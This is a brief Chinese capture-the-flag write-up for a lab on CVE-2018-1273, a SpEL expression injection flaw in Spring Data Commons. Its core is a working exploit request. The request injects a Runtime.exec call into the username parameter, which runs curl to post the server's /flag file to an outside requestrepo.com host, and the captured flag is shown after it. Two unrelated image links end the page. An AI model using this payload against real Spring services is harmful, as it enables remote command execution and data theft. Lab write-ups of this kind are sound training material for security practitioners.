春秋云镜 CVE-2018-1273 Spring-data-commons 远程命令执行漏洞
靶标介绍
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
启动场景
漏洞利用
exp
POST /users?page=&size=5 HTTP/1.1username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -X POST --data @/flag http://qc5xdbn2.requestrepo.com")]=&password=&repeatedPassword=1
得到flag
flag{07f562e8-a796-49b7-be48-a022c5cf44a1}
![[论文笔记]SiameseNet](https://img-blog.csdnimg.cn/img_convert/853619ed045766a8cbd22e7215564f5f.png)
![java八股文面试[多线程]——线程的状态](https://img-blog.csdnimg.cn/img_convert/999a7fa69b18b787b0a1f693d0a1f00f.png)
